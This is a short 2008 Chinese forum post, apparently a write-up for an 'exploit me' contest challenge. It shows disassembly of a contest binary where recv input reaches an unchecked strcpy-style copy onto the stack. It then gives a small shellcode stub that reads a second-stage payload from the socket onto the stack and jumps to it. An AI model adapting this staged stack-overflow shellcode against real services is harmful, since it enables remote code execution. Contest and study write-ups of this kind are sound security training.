-
-
[原创]exploit me提要
-
发表于:
2008-1-2 12:51
7884
-
一开始没打算参赛,晚上无聊搞了搞,发觉还是很简单的。
其实我做的很不好,懒得写文档,但至少可以跨平台的。
A题:
用E语言发了一个大包给本地,直接崩了,从recv入手,很容易得到
00401000 /$ 81EC C8000000 sub esp, 0C8
00401006 |. 83C9 FF or ecx, FFFFFFFF
00401009 |. 33C0 xor eax, eax
0040100B |. 8D5424 00 lea edx, dword ptr [esp]
0040100F |. 56 push esi
00401010 |. 57 push edi
00401011 |. 8BBC24 D40000>mov edi, dword ptr [esp+D4]
00401018 |. 68 4C904000 push exploit_.0040904C ; ASCII "********************"
0040101D |. F2:AE repne scasb ; \这里是个strcpyA
0040101F |. F7D1 not ecx
00401021 |. 2BF9 sub edi, ecx
00401023 |. 8BC1 mov eax, ecx
00401025 |. 8BF7 mov esi, edi
00401027 |. 8BFA mov edi, edx
00401029 |. C1E9 02 shr ecx, 2
0040102C |. F3:A5 rep movsd
0040102E |. 8BC8 mov ecx, eax
00401030 |. 83E1 03 and ecx, 3
00401033 |. F3:A4 rep movsb ; /
0040120B |. 50 |push eax ; /Flags => 0
0040120C |. F3:AB |rep stosd ; |
0040120E |. 8D4C24 38 |lea ecx, dword ptr [esp+38] ; |
00401212 |. 68 00020000 |push 200 ; |BufSize = 200 (512.)
00401217 |. 51 |push ecx ; |Buffer
00401218 |. 53 |push ebx ; |Socket
00401219 |. FF15 D8804000 |call dword ptr [<&WS2_32.#16>] ; \recv
0040121F |. 8BF0 |mov esi, eax
00401221 |. 85F6 |test esi, esi
00401223 |. 7D 26 |jge short exploit_.0040124B
00401225 |. 68 74904000 |push exploit_.00409074 ; ASCII "reading stream message erro!"
0040122A |. B9 689A4000 |mov ecx, exploit_.00409A68
0040122F |. E8 F3010000 |call exploit_.00401427
00401234 |. 68 D0124000 |push exploit_.004012D0
00401239 |. 6A 0A |push 0A ; /Arg1 = 0000000A
0040123B |. 8BC8 |mov ecx, eax ; |
0040123D |. E8 9E000000 |call exploit_.004012E0 ; \exploit_.004012E0
00401242 |. 8BC8 |mov ecx, eax
00401244 |. E8 67000000 |call exploit_.004012B0
00401249 |. 33F6 |xor esi, esi
0040124B |> 8D5424 34 |lea edx, dword ptr [esp+34]
mov edi, esp
mov ecx, 1024;alloc
sub edi, ecx
push 0
push ecx
push edi
push ebx
mov eax, 4080D8h
call dword ptr [eax]; 这里是recv
jmp edi
; fucker
; initX XFL_ALL
;
; push 1000
; push 1000
; callX Beep
;
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!